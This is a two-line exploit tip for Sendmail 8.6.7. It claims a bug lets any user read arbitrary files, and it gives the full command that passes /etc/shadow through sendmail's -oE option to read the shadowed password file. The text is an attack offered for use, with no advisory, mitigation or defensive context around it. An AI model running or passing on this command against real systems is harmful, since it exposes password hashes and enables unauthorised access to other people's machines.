A bug in Sendmail 8.6.7 allows anyone to read any file,
including the shadowed password file:

/usr/lib/sendmail -oE/etc/shadow bounce
From: your_username